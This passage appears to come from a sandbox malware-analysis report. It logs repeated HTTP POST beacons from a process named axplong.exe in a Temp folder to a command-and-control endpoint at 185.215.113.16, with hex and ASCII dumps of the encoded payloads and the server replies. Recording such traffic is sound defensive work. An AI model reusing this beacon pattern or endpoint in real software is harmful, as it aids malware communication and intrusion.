                    Refresh: 0; url = Login.php
                    Data Raw: 31 0d 0a 20 0d 0a 30 0d 0a 0d 0a
                    Data Ascii: 1 0
                    Sep 27, 2024 01:43:32.728928089 CEST310OUTPOST /Jo89Ku7d/index.php HTTP/1.1
                    Content-Type: application/x-www-form-urlencoded
                    Host: 185.215.113.16
                    Content-Length: 156
                    Cache-Control: no-cache
                    Data Raw: 72 3d 41 42 31 45 39 44 32 37 35 41 46 38 38 31 42 43 46 37 35 34 35 46 46 43 39 45 35 42 37 30 41 39 43 30 31 44 45 32 30 41 44 39 32 41 38 43 41 39 46 30 45 45 32 36 46 38 41 45 46 42 42 32 34 35 37 38 42 34 42 35 36 34 37 41 32 38 38 45 37 46 38 31 30 30 38 44 41 39 36 41 45 36 43 37 46 44 41 37 34 30 43 42 46 33 46 44 33 33 43 32 30 34 41 36 42 34 30 43 30 41 35 43 37 30 33 31 38 42 42 43 30 30 36 35 43 30 44 35 41 39 35 39 36 37 44 46 34 41 30 36 30 33 33 32
                    Data Ascii: r=AB1E9D275AF881BCF7545FFC9E5B70A9C01DE20AD92A8CA9F0EE26F8AEFBB24578B4B5647A288E7F81008DA96AE6C7FDA740CBF3FD33C204A6B40C0A5C70318BBC0065C0D5A95967DF4A060332
                    Sep 27, 2024 01:43:32.958177090 CEST196INHTTP/1.1 200 OK
                    Server: nginx/1.18.0 (Ubuntu)
                    Date: Thu, 26 Sep 2024 23:43:32 GMT
                    Content-Type: text/html; charset=UTF-8
                    Transfer-Encoding: chunked
                    Connection: keep-alive
                    Data Raw: 37 0d 0a 20 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                    Data Ascii: 7 <c><d>0


                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                    27192.168.2.849739185.215.113.16807648C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe
                    TimestampBytes transferredDirectionData
                    Sep 27, 2024 01:43:33.068240881 CEST156OUTPOST /Jo89Ku7d/index.php HTTP/1.1
                    Content-Type: application/x-www-form-urlencoded
                    Host: 185.215.113.16
                    Content-Length: 4
                    Cache-Control: no-cache
                    Data Raw: 73 74 3d 73
                    Data Ascii: st=s
                    Sep 27, 2024 01:43:33.761631966 CEST219INHTTP/1.1 200 OK
                    Server: nginx/1.18.0 (Ubuntu)
                    Date: Thu, 26 Sep 2024 23:43:33 GMT
                    Content-Type: text/html; charset=UTF-8
                    Transfer-Encoding: chunked
                    Connection: keep-alive
                    Refresh: 0; url = Login.php
                    Data Raw: 31 0d 0a 20 0d 0a 30 0d 0a 0d 0a
                    Data Ascii: 1 0
                    Sep 27, 2024 01:43:33.762690067 CEST310OUTPOST /Jo89Ku7d/index.php HTTP/1.1
                    Content-Type: application/x-www-form-urlencoded
                    Host: 185.215.113.16
                    Content-Length: 156
                    Cache-Control: no-cache
                    Data Raw: 72 3d 41 42 31 45 39 44 32 37 35 41 46 38 38 31 42 43 46 37 35 34 35 46 46 43 39 45 35 42 37 30 41 39 43 30 31 44 45 32 30 41 44 39 32 41 38 43 41 39 46 30 45 45 32 36 46 38 41 45 46 42 42 32 34 35 37 38 42 34 42 35 36 34 37 41 32 38 38 45 37 46 38 31 30 30 38 44 41 39 36 41 45 36 43 37 46 44 41 37 34 30 43 42 46 33 46 44 33 33 43 32 30 34 41 36 42 34 30 43 30 41 35 43 37 30 33 31 38 42 42 43 30 30 36 35 43 30 44 35 41 39 35 39 36 37 44 46 34 41 30 36 30 33 33 32
                    Data Ascii: r=AB1E9D275AF881BCF7545FFC9E5B70A9C01DE20AD92A8CA9F0EE26F8AEFBB24578B4B5647A288E7F81008DA96AE6C7FDA740CBF3FD33C204A6B40C0A5C70318BBC0065C0D5A95967DF4A060332
                    Sep 27, 2024 01:43:33.984903097 CEST196INHTTP/1.1 200 OK
                    Server: nginx/1.18.0 (Ubuntu)
                    Date: Thu, 26 Sep 2024 23:43:33 GMT
                    Content-Type: text/html; charset=UTF-8
                    Transfer-Encoding: chunked
                    Connection: keep-alive
                    Data Raw: 37 0d 0a 20 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                    Data Ascii: 7 <c><d>0


                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                    28192.168.2.849740185.215.113.16807648C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe
                    TimestampBytes transferredDirectionData
                    Sep 27, 2024 01:43:34.099169970 CEST156OUTPOST /Jo89Ku7d/index.php HTTP/1.1
                    Content-Type: application/x-www-form-urlencoded
                    Host: 185.215.113.16
                    Content-Length: 4
                    Cache-Control: no-cache
                    Data Raw: 73 74 3d 73
                    Data Ascii: st=s
                    Sep 27, 2024 01:43:34.806998968 CEST219INHTTP/1.1 200 OK
                    Server: nginx/1.18.0 (Ubuntu)
                    Date: Thu, 26 Sep 2024 23:43:34 GMT
                    Content-Type: text/html; charset=UTF-8
                    Transfer-Encoding: chunked
                    Connection: keep-alive
                    Refresh: 0; url = Login.php
                    Data Raw: 31 0d 0a 20 0d 0a 30 0d 0a 0d 0a
                    Data Ascii: 1 0
                    Sep 27, 2024 01:43:34.922063112 CEST310OUTPOST /Jo89Ku7d/index.php HTTP/1.1
                    Content-Type: application/x-www-form-urlencoded
                    Host: 185.215.113.16
                    Content-Length: 156
                    Cache-Control: no-cache
                    Data Raw: 72 3d 41 42 31 45 39 44 32 37 35 41 46 38 38 31 42 43 46 37 35 34 35 46 46 43 39 45 35 42 37 30 41 39 43 30 31 44 45 32 30 41 44 39 32 41 38 43 41 39 46 30 45 45 32 36 46 38 41 45 46 42 42 32 34 35 37 38 42 34 42 35 36 34 37 41 32 38 38 45 37 46 38 31 30 30 38 44 41 39 36 41 45 36 43 37 46 44 41 37 34 30 43 42 46 33 46 44 33 33 43 32 30 34 41 36 42 34 30 43 30 41 35 43 37 30 33 31 38 42 42 43 30 30 36 35 43 30 44 35 41 39 35 39 36 37 44 46 34 41 30 36 30 33 33 32
                    Data Ascii: r=AB1E9D275AF881BCF7545FFC9E5B70A9C01DE20AD92A8CA9F0EE26F8AEFBB24578B4B5647A288E7F81008DA96AE6C7FDA740CBF3FD33C204A6B40C0A5C70318BBC0065C0D5A95967DF4A060332
                    Sep 27, 2024 01:43:35.148251057 CEST196INHTTP/1.1 200 OK
                    Server: nginx/1.18.0 (Ubuntu)
                    Date: Thu, 26 Sep 2024 23:43:35 GMT
                    Content-Type: text/html; charset=UTF-8
                    Transfer-Encoding: chunked
                    Connection: keep-alive
                    Data Raw: 37 0d 0a 20 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                    Data Ascii: 7 <c><d>0


                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                    29192.168.2.849741185.215.113.16807648C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe
                    TimestampBytes transferredDirectionData
                    Sep 27, 2024 01:43:35.269680023 CEST156OUTPOST /Jo89Ku7d/index.php HTTP/1.1
                    Content-Type: application/x-www-form-urlencoded
                    Host: 185.215.113.16
                    Content-Length: 4
                    Cache-Control: no-cache
                    Data Raw: 73 74 3d 73
                    Data Ascii: st=s
                    Sep 27, 2024 01:43:36.005976915 CEST219INHTTP/1.1 200 OK
                    Server: nginx/1.18.0 (Ubuntu)
                    Date: Thu, 26 Sep 2024 23:43:35 GMT
                    Content-Type: text/html; charset=UTF-8
                    Transfer-Encoding: chunked
                    Connection: keep-alive
                    Refresh: 0; url = Login.php
                    Data Raw: 31 0d 0a 20 0d 0a 30 0d 0a 0d 0a
                    Data Ascii: 1 0
                    Sep 27, 2024 01:43:36.006787062 CEST310OUTPOST /Jo89Ku7d/index.php HTTP/1.1
                    Content-Type: application/x-www-form-urlencoded
                    Host: 185.215.113.16
                    Content-Length: 156
                    Cache-Control: no-cache
                    Data Raw: 72 3d 41 42 31 45 39 44 32 37 35 41 46 38 38 31 42 43 46 37 35 34 35 46 46 43 39 45 35 42 37 30 41 39 43 30 31 44 45 32 30 41 44 39 32 41 38 43 41 39 46 30 45 45 32 36 46 38 41 45 46 42 42 32 34 35 37 38 42 34 42 35 36 34 37 41 32 38 38 45 37 46 38 31 30 30 38 44 41 39 36 41 45 36 43 37 46 44 41 37 34 30 43 42 46 33 46 44 33 33 43 32 30 34 41 36 42 34 30 43 30 41 35 43 37 30 33 31 38 42 42 43 30 30 36 35 43 30 44 35 41 39 35 39 36 37 44 46 34 41 30 36 30 33 33 32
                    Data Ascii: r=AB1E9D275AF881BCF7545FFC9E5B70A9C01DE20AD92A8CA9F0EE26F8AEFBB24578B4B5647A288E7F81008DA96AE6C7FDA740CBF3FD33C204A6B40C0A5C70318BBC0065C0D5A95967DF4A060332
                    Sep 27, 2024 01:43:36.233390093 CEST196INHTTP/1.1 200 OK
                    Server: nginx/1.18.0 (Ubuntu)
                    Date: Thu, 26 Sep 2024 23:43:36 GMT
                    Content-Type: text/html; charset=UTF-8
                    Transfer-Encoding: chunked
                    Connection: keep-alive
                    Data Raw: 37 0d 0a 20 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                    Data Ascii: 7 <c><d>0


                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                    30192.168.2.849742185.215.113.16807648C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe
                    TimestampBytes transferredDirectionData
                    Sep 27, 2024 01:43:36.348828077 CEST156OUTPOST /Jo89Ku7d/index.php HTTP/1.1
                    Content-Type: application/x-www-form-urlencoded
                    Host: 185.215.113.16
                    Content-Length: 4
                    Cache-Control: no-cache
                    Data Raw: 73 74 3d 73
                    Data Ascii: st=s
                    Sep 27, 2024 01:43:37.047596931 CEST219INHTTP/1.1 200 OK
                    Server: nginx/1.18.0 (Ubuntu)
                    Date: Thu, 26 Sep 2024 23:43:36 GMT
                    Content-Type: text/html; charset=UTF-8
                    Transfer-Encoding: chunked
                    Connection: keep-alive
                    Refresh: 0; url = Login.php
                    Data Raw: 31 0d 0a 20 0d 0a 30 0d 0a 0d 0a
                    Data Ascii: 1 0
                    Sep 27, 2024 01:43:37.048603058 CEST310OUTPOST /Jo89Ku7d/index.php HTTP/1.1
                    Content-Type: application/x-www-form-urlencoded
                    Host: 185.215.113.16
                    Content-Length: 156
                    Cache-Control: no-cache
                    Data Raw: 72 3d 41 42 31 45 39 44 32 37 35 41 46 38 38 31 42 43 46 37 35 34 35 46 46 43 39 45 35 42 37 30 41 39 43 30 31 44 45 32 30 41 44 39 32 41 38 43 41 39 46 30 45 45 32 36 46 38 41 45 46 42 42 32 34 35 37 38 42 34 42 35 36 34 37 41 32 38 38 45 37 46 38 31 30 30 38 44 41 39 36 41 45 36 43 37 46 44 41 37 34 30 43 42 46 33 46 44 33 33 43 32 30 34 41 36 42 34 30 43 30 41 35 43 37 30 33 31 38 42 42 43 30 30 36 35 43 30 44 35 41 39 35 39 36 37 44 46 34 41 30 36 30 33 33 32
                    Data Ascii: r=AB1E9D275AF881BCF7545FFC9E5B70A9C01DE20AD92A8CA9F0EE26F8AEFBB24578B4B5647A288E7F81008DA96AE6C7FDA740CBF3FD33C204A6B40C0A5C70318BBC0065C0D5A95967DF4A060332
                    Sep 27, 2024 01:43:37.275119066 CEST196INHTTP/1.1 200 OK
                    Server: nginx/1.18.0 (Ubuntu)
                    Date: Thu, 26 Sep 2024 23:43:37 GMT
                    Content-Type: text/html; charset=UTF-8
                    Transfer-Encoding: chunked
                    Connection: keep-alive
                    Data Raw: 37 0d 0a 20 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                    Data Ascii: 7 <c><d>0


                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                    31192.168.2.849743185.215.113.16807648C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe
                    TimestampBytes transferredDirectionData
                    Sep 27, 2024 01:43:37.464751959 CEST156OUTPOST /Jo89Ku7d/index.php HTTP/1.1
                    Content-Type: application/x-www-form-urlencoded
                    Host: 185.215.113.16
                    Content-Length: 4
                    Cache-Control: no-cache
                    Data Raw: 73 74 3d 73
                    Data Ascii: st=s
                    Sep 27, 2024 01:43:38.176256895 CEST219INHTTP/1.1 200 OK
                    Server: nginx/1.18.0 (Ubuntu)
                    Date: Thu, 26 Sep 2024 23:43:38 GMT
                    Content-Type: text/html; charset=UTF-8
                    Transfer-Encoding: chunked
                    Connection: keep-alive
                    Refresh: 0; url = Login.php
                    Data Raw: 31 0d 0a 20 0d 0a 30 0d 0a 0d 0a
                    Data Ascii: 1 0
                    Sep 27, 2024 01:43:38.177397966 CEST310OUTPOST /Jo89Ku7d/index.php HTTP/1.1
                    Content-Type: application/x-www-form-urlencoded
                    Host: 185.215.113.16
                    Content-Length: 156
                    Cache-Control: no-cache
                    Data Raw: 72 3d 41 42 31 45 39 44 32 37 35 41 46 38 38 31 42 43 46 37 35 34 35 46 46 43 39 45 35 42 37 30 41 39 43 30 31 44 45 32 30 41 44 39 32 41 38 43 41 39 46 30 45 45 32 36 46 38 41 45 46 42 42 32 34 35 37 38 42 34 42 35 36 34 37 41 32 38 38 45 37 46 38 31 30 30 38 44 41 39 36 41 45 36 43 37 46 44 41 37 34 30 43 42 46 33 46 44 33 33 43 32 30 34 41 36 42 34 30 43 30 41 35 43 37 30 33 31 38 42 42 43 30 30 36 35 43 30 44 35 41 39 35 39 36 37 44 46 34 41 30 36 30 33 33 32
                    Data Ascii: r=AB1E9D275AF881BCF7545FFC9E5B70A9C01DE20AD92A8CA9F0EE26F8AEFBB24578B4B5647A288E7F81008DA96AE6C7FDA740CBF3FD33C204A6B40C0A5C70318BBC0065C0D5A95967DF4A060332
                    Sep 27, 2024 01:43:38.408268929 CEST196INHTTP/1.1 200 OK
                    Server: nginx/1.18.0 (Ubuntu)
                    Date: Thu, 26 Sep 2024 23:43:38 GMT
                    Content-Type: text/html; charset=UTF-8
                    Transfer-Encoding: chunked
                    Connection: keep-alive
                    Data Raw: 37 0d 0a 20 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                    Data Ascii: 7 <c><d>0


                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                    32192.168.2.849744185.215.113.16807648C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe
                    TimestampBytes transferredDirectionData
                    Sep 27, 2024 01:43:38.522445917 CEST156OUTPOST /Jo89Ku7d/index.php HTTP/1.1
                    Content-Type: application/x-www-form-urlencoded
                    Host: 185.215.113.16
                    Content-Length: 4
                    Cache-Control: no-cache
                    Data Raw: 73 74 3d 73
                    Data Ascii: st=s
                    Sep 27, 2024 01:43:39.247031927 CEST219INHTTP/1.1 200 OK
                    Server: nginx/1.18.0 (Ubuntu)
                    Date: Thu, 26 Sep 2024 23:43:39 GMT
                    Content-Type: text/html; charset=UTF-8
                    Transfer-Encoding: chunked
                    Connection: keep-alive
                    Refresh: 0; url = Login.php
                    Data Raw: 31 0d 0a 20 0d 0a 30 0d 0a 0d 0a
                    Data Ascii: 1 0
                    Sep 27, 2024 01:43:39.247909069 CEST310OUTPOST /Jo89Ku7d/index.php HTTP/1.1
                    Content-Type: application/x-www-form-urlencoded
                    Host: 185.215.113.16
                    Content-Length: 156
                    Cache-Control: no-cache
                    Data Raw: 72 3d 41 42 31 45 39 44 32 37 35 41 46 38 38 31 42 43 46 37 35 34 35 46 46 43 39 45 35 42 37 30 41 39 43 30 31 44 45 32 30 41 44 39 32 41 38 43 41 39 46 30 45 45 32 36 46 38 41 45 46 42 42 32 34 35 37 38 42 34 42 35 36 34 37 41 32 38 38 45 37 46 38 31 30 30 38 44 41 39 36 41 45 36 43 37 46 44 41 37 34 30 43 42 46 33 46 44 33 33 43 32 30 34 41 36 42 34 30 43 30 41 35 43 37 30 33 31 38 42 42 43 30 30 36 35 43 30 44 35 41 39 35 39 36 37 44 46 34 41 30 36 30 33 33 32
                    Data Ascii: r=AB1E9D275AF881BCF7545FFC9E5B70A9C01DE20AD92A8CA9F0EE26F8AEFBB24578B4B5647A288E7F81008DA96AE6C7FDA740CBF3FD33C204A6B40C0A5C70318BBC0065C0D5A95967DF4A060332
                    Sep 27, 2024 01:43:39.483381987 CEST196INHTTP/1.1 200 OK
                    Server: nginx/1.18.0 (Ubuntu)
                    Date: Thu, 26 Sep 2024 23:43:39 GMT
                    Content-Type: text/html; charset=UTF-8
                    Transfer-Encoding: chunked
                    Connection: keep-alive
                    Data Raw: 37 0d 0a 20 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                    Data Ascii: 7 <c><d>0


                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                    33192.168.2.849745185.215.113.16807648C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe
                    TimestampBytes transferredDirectionData
                    Sep 27, 2024 01:43:39.598860025 CEST156OUTPOST /Jo89Ku7d/index.php HTTP/1.1
                    Content-Type: application/x-www-form-urlencoded
                    Host: 185.215.113.16
                    Content-Length: 4
                    Cache-Control: no-cache
                    Data Raw: 73 74 3d 73
                    Data Ascii: st=s
                    Sep 27, 2024 01:43:40.314256907 CEST219INHTTP/1.1 200 OK
                    Server: nginx/1.18.0 (Ubuntu)
                    Date: Thu, 26 Sep 2024 23:43:40 GMT
                    Content-Type: text/html; charset=UTF-8
                    Transfer-Encoding: chunked
                    Connection: keep-alive
                    Refresh: 0; url = Login.php
                    Data Raw: 31 0d 0a 20 0d 0a 30 0d 0a 0d 0a
                    Data Ascii: 1 0
                    Sep 27, 2024 01:43:40.315042973 CEST310OUTPOST /Jo89Ku7d/index.php HTTP/1.1
                    Content-Type: application/x-www-form-urlencoded
                    Host: 185.215.113.16
                    Content-Length: 156
                    Cache-Control: no-cache
                    Data Raw: 72 3d 41 42 31 45 39 44 32 37 35 41 46 38 38 31 42 43 46 37 35 34 35 46 46 43 39 45 35 42 37 30 41 39 43 30 31 44 45 32 30 41 44 39 32 41 38 43 41 39 46 30 45 45 32 36 46 38 41 45 46 42 42 32 34 35 37 38 42 34 42 35 36 34 37 41 32 38 38 45 37 46 38 31 30 30 38 44 41 39 36 41 45 36 43 37 46 44 41 37 34 30 43 42 46 33 46 44 33 33 43 32 30 34 41 36 42 34 30 43 30 41 35 43 37 30 33 31 38 42 42 43 30 30 36 35 43 30 44 35 41 39 35 39 36 37 44 46 34 41 30 36 30 33 33 32
                    Data Ascii: r=AB1E9D275AF881BCF7545FFC9E5B70A9C01DE20AD92A8CA9F0EE26F8AEFBB24578B4B5647A288E7F81008DA96AE6C7FDA740CBF3FD33C204A6B40C0A5C70318BBC0065C0D5A95967DF4A060332
                    Sep 27, 2024 01:43:40.539505959 CEST196INHTTP/1.1 200 OK
                    Server: nginx/1.18.0 (Ubuntu)
                    Date: Thu, 26 Sep 2024 23:43:40 GMT
                    Content-Type: text/html; charset=UTF-8
                    Transfer-Encoding: chunked
                    Connection: keep-alive
                    Data Raw: 37 0d 0a 20 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                    Data Ascii: 7 <c><d>0


                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                    34192.168.2.849746185.215.113.16807648C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe
                    TimestampBytes transferredDirectionData
                    Sep 27, 2024 01:43:40.736553907 CEST156OUTPOST /Jo89Ku7d/index.php HTTP/1.1
                    Content-Type: application/x-www-form-urlencoded
                    Host: 185.215.113.16
                    Content-Length: 4
                    Cache-Control: no-cache
                    Data Raw: 73 74 3d 73
                    Data Ascii: st=s
                    Sep 27, 2024 01:43:42.041127920 CEST219INHTTP/1.1 200 OK
                    Server: nginx/1.18.0 (Ubuntu)
                    Date: Thu, 26 Sep 2024 23:43:41 GMT
                    Content-Type: text/html; charset=UTF-8
                    Transfer-Encoding: chunked
                    Connection: keep-alive
                    Refresh: 0; url = Login.php
                    Data Raw: 31 0d 0a 20 0d 0a 30 0d 0a 0d 0a
                    Data Ascii: 1 0
                    Sep 27, 2024 01:43:42.041161060 CEST219INHTTP/1.1 200 OK
                    Server: nginx/1.18.0 (Ubuntu)
                    Date: Thu, 26 Sep 2024 23:43:41 GMT
                    Content-Type: text/html; charset=UTF-8
                    Transfer-Encoding: chunked
                    Connection: keep-alive
                    Refresh: 0; url = Login.php
                    Data Raw: 31 0d 0a 20 0d 0a 30 0d 0a 0d 0a
                    Data Ascii: 1 0
                    Sep 27, 2024 01:43:42.041225910 CEST219INHTTP/1.1 200 OK
                    Server: nginx/1.18.0 (Ubuntu)
                    Date: Thu, 26 Sep 2024 23:43:41 GMT
                    Content-Type: text/html; charset=UTF-8
                    Transfer-Encoding: chunked
                    Connection: keep-alive
                    Refresh: 0; url = Login.php
                    Data Raw: 31 0d 0a 20 0d 0a 30 0d 0a 0d 0a
                    Data Ascii: 1 0
                    Sep 27, 2024 01:43:42.042172909 CEST310OUTPOST /Jo89Ku7d/index.php HTTP/1.1
                    Content-Type: application/x-www-form-urlencoded
                    Host: 185.215.113.16
                    Content-Length: 156
                    Cache-Control: no-cache
                    Data Raw: 72 3d 41 42 31 45 39 44 32 37 35 41 46 38 38 31 42 43 46 37 35 34 35 46 46 43 39 45 35 42 37 30 41 39 43 30 31 44 45 32 30 41 44 39 32 41 38 43 41 39 46 30 45 45 32 36 46 38 41 45 46 42 42 32 34 35 37 38 42 34 42 35 36 34 37 41 32 38 38 45 37 46 38 31 30 30 38 44 41 39 36 41 45 36 43 37 46 44 41 37 34 30 43 42 46 33 46 44 33 33 43 32 30 34 41 36 42 34 30 43 30 41 35 43 37 30 33 31 38 42 42 43 30 30 36 35 43 30 44 35 41 39 35 39 36 37 44 46 34 41 30 36 30 33 33 32
                    Data Ascii: r=AB1E9D275AF881BCF7545FFC9E5B70A9C01DE20AD92A8CA9F0EE26F8AEFBB24578B4B5647A288E7F81008DA96AE6C7FDA740CBF3FD33C204A6B40C0A5C70318BBC0065C0D5A95967DF4A060332
                    Sep 27, 2024 01:43:42.267817974 CEST219INHTTP/1.1 200 OK
                    Server: nginx/1.18.0 (Ubuntu)
                    Date: Thu, 26 Sep 2024 23:43:41 GMT
                    Content-Type: text/html; charset=UTF-8
                    Transfer-Encoding: chunked
                    Connection: keep-alive
                    Refresh: 0; url = Login.php
                    Data Raw: 31 0d 0a 20 0d 0a 30 0d 0a 0d 0a
                    Data Ascii: 1 0
                    Sep 27, 2024 01:43:42.488123894 CEST196INHTTP/1.1 200 OK
                    Server: nginx/1.18.0 (Ubuntu)
                    Date: Thu, 26 Sep 2024 23:43:42 GMT
                    Content-Type: text/html; charset=UTF-8
                    Transfer-Encoding: chunked
                    Connection: keep-alive
                    Data Raw: 37 0d 0a 20 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                    Data Ascii: 7 <c><d>0


                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                    35192.168.2.849747185.215.113.16807648C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe
                    TimestampBytes transferredDirectionData
                    Sep 27, 2024 01:43:42.599138021 CEST156OUTPOST /Jo89Ku7d/index.php HTTP/1.1
                    Content-Type: application/x-www-form-urlencoded
                    Host: 185.215.113.16
                    Content-Length: 4
                    Cache-Control: no-cache
                    Data Raw: 73 74 3d 73
                    Data Ascii: st=s
                    Sep 27, 2024 01:43:43.312964916 CEST219INHTTP/1.1 200 OK
                    Server: nginx/1.18.0 (Ubuntu)
                    Date: Thu, 26 Sep 2024 23:43:43 GMT
                    Content-Type: text/html; charset=UTF-8
                    Transfer-Encoding: chunked
                    Connection: keep-alive
                    Refresh: 0; url = Login.php
                    Data Raw: 31 0d 0a 20 0d 0a 30 0d 0a 0d 0a
                    Data Ascii: 1 0
                    Sep 27, 2024 01:43:43.313816071 CEST310OUTPOST /Jo89Ku7d/index.php HTTP/1.1
                    Content-Type: application/x-www-form-urlencoded
                    Host: 185.215.113.16
                    Content-Length: 156
                    Cache-Control: no-cache
                    Data Raw: 72 3d 41 42 31 45 39 44 32 37 35 41 46 38 38 31 42 43 46 37 35 34 35 46 46 43 39 45 35 42 37 30 41 39 43 30 31 44 45 32 30 41 44 39 32 41 38 43 41 39 46 30 45 45 32 36 46 38 41 45 46 42 42 32 34 35 37 38 42 34 42 35 36 34 37 41 32 38 38 45 37 46 38 31 30 30 38 44 41 39 36 41 45 36 43 37 46 44 41 37 34 30 43 42 46 33 46 44 33 33 43 32 30 34 41 36 42 34 30 43 30 41 35 43 37 30 33 31 38 42 42 43 30 30 36 35 43 30 44 35 41 39 35 39 36 37 44 46 34 41 30 36 30 33 33 32
                    Data Ascii: r=AB1E9D275AF881BCF7545FFC9E5B70A9C01DE20AD92A8CA9F0EE26F8AEFBB24578B4B5647A288E7F81008DA96AE6C7FDA740CBF3FD33C204A6B40C0A5C70318BBC0065C0D5A95967DF4A060332
                    Sep 27, 2024 01:43:43.547933102 CEST196INHTTP/1.1 200 OK
                    Server: nginx/1.18.0 (Ubuntu)
                    Date: Thu, 26 Sep 2024 23:43:43 GMT
                    Content-Type: text/html; charset=UTF-8
                    Transfer-Encoding: chunked
                    Connection: keep-alive
                    Data Raw: 37 0d 0a 20 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                    Data Ascii: 7 <c><d>0


                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                    36192.168.2.849748185.215.113.16807648C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe
                    TimestampBytes transferredDirectionData
                    Sep 27, 2024 01:43:43.740138054 CEST156OUTPOST /Jo89Ku7d/index.php HTTP/1.1
                    Content-Type: application/x-www-form-urlencoded
                    Host: 185.215.113.16
                    Content-Length: 4
                    Cache-Control: no-cache
                    Data Raw: 73 74 3d 73
                    Data Ascii: st=s
                    Sep 27, 2024 01:43:44.463896036 CEST219INHTTP/1.1 200 OK
                    Server: nginx/1.18.0 (Ubuntu)
                    Date: Thu, 26 Sep 2024 23:43:44 GMT
                    Content-Type: text/html; charset=UTF-8
                    Transfer-Encoding: chunked
                    Connection: keep-alive
                    Refresh: 0; url = Login.php
                    Data Raw: 31 0d 0a 20 0d 0a 30 0d 0a 0d 0a
                    Data Ascii: 1 0
                    Sep 27, 2024 01:43:44.464926958 CEST310OUTPOST /Jo89Ku7d/index.php HTTP/1.1
                    Content-Type: application/x-www-form-urlencoded
                    Host: 185.215.113.16
                    Content-Length: 156
                    Cache-Control: no-cache
                    Data Raw: 72 3d 41 42 31 45 39 44 32 37 35 41 46 38 38 31 42 43 46 37 35 34 35 46 46 43 39 45 35 42 37 30 41 39 43 30 31 44 45 32 30 41 44 39 32 41 38 43 41 39 46 30 45 45 32 36 46 38 41 45 46 42 42 32 34 35 37 38 42 34 42 35 36 34 37 41 32 38 38 45 37 46 38 31 30 30 38 44 41 39 36 41 45 36 43 37 46 44 41 37 34 30 43 42 46 33 46 44 33 33 43 32 30 34 41 36 42 34 30 43 30 41 35 43 37 30 33 31 38 42 42 43 30 30 36 35 43 30 44 35 41 39 35 39 36 37 44 46 34 41 30 36 30 33 33 32
                    Data Ascii: r=AB1E9D275AF881BCF7545FFC9E5B70A9C01DE20AD92A8CA9F0EE26F8AEFBB24578B4B5647A288E7F81008DA96AE6C7FDA740CBF3FD33C204A6B40C0A5C70318BBC0065C0D5A95967DF4A060332
                    Sep 27, 2024 01:43:44.700664043 CEST196INHTTP/1.1 200 OK
                    Server: nginx/1.18.0 (Ubuntu)
                    Date: Thu, 26 Sep 2024 23:43:44 GMT
                    Content-Type: text/html; charset=UTF-8
                    Transfer-Encoding: chunked
                    Connection: keep-alive
                    Data Raw: 37 0d 0a 20 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                    Data Ascii: 7 <c><d>0


                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                    37192.168.2.849749185.215.113.16807648C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe
                    TimestampBytes transferredDirectionData
                    Sep 27, 2024 01:43:44.818308115 CEST156OUTPOST /Jo89Ku7d/index.php HTTP/1.1
                    Content-Type: application/x-www-form-urlencoded
                    Host: 185.215.113.16
                    Content-Length: 4
                    Cache-Control: no-cache
                    Data Raw: 73 74 3d 73
                    Data Ascii: st=s
                    Sep 27, 2024 01:43:45.504646063 CEST219INHTTP/1.1 200 OK
                    Server: nginx/1.18.0 (Ubuntu)
                    Date: Thu, 26 Sep 2024 23:43:45 GMT
                    Content-Type: text/html; charset=UTF-8
                    Transfer-Encoding: chunked
                    Connection: keep-alive
                    Refresh: 0; url = Login.php
                    Data Raw: 31 0d 0a 20 0d 0a 30 0d 0a 0d 0a
                    Data Ascii: 1 0
                    Sep 27, 2024 01:43:45.505395889 CEST310OUTPOST /Jo89Ku7d/index.php HTTP/1.1
                    Content-Type: application/x-www-form-urlencoded
                    Host: 185.215.113.16
                    Content-Length: 156
                    Cache-Control: no-cache
                    Data Raw: 72 3d 41 42 31 45 39 44 32 37 35 41 46 38 38 31 42 43 46 37 35 34 35 46 46 43 39 45 35 42 37 30 41 39 43 30 31 44 45 32 30 41 44 39 32 41 38 43 41 39 46 30 45 45 32 36 46 38 41 45 46 42 42 32 34 35 37 38 42 34 42 35 36 34 37 41 32 38 38 45 37 46 38 31 30 30 38 44 41 39 36 41 45 36 43 37 46 44 41 37 34 30 43 42 46 33 46 44 33 33 43 32 30 34 41 36 42 34 30 43 30 41 35 43 37 30 33 31 38 42 42 43 30 30 36 35 43 30 44 35 41 39 35 39 36 37 44 46 34 41 30 36 30 33 33 32
                    Data Ascii: r=AB1E9D275AF881BCF7545FFC9E5B70A9C01DE20AD92A8CA9F0EE26F8AEFBB24578B4B5647A288E7F81008DA96AE6C7FDA740CBF3FD33C204A6B40C0A5C70318BBC0065C0D5A95967DF4A060332
                    Sep 27, 2024 01:43:45.732218981 CEST196INHTTP/1.1 200 OK
